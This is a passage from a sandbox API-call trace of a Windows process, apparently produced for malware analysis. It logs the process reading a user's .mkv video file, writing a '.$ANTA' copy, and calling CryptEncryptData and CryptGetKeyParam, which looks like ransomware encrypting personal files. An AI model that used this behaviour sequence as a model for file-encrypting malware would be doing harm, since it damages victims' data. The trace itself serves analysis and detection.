(in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0103.383] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.383] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\c1tN0jRrSKz9_ 3.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\c1tn0jrrskz9_ 3.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0103.384] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.384] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.384] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0103.384] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0103.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0103.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9b68 | out: hHeap=0x1780000) returned 1 [0103.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.434] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca")) returned 0x10 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a49d0 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.434] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\c1tN0jRrSKz9_ 3.mkv.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\c1tn0jrrskz9_ 3.mkv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.435] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0103.435] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0103.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.438] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0103.438] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0xbcb7, lpOverlapped=0x0) returned 1 [0103.439] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0103.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0103.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0103.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0103.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0103.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0103.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0103.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.442] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0103.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.443] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.443] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0103.443] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0103.444] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0103.444] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.444] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0103.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0103.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0103.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0103.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0103.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0103.446] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e2a60, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2a60*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0103.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0103.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0103.448] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 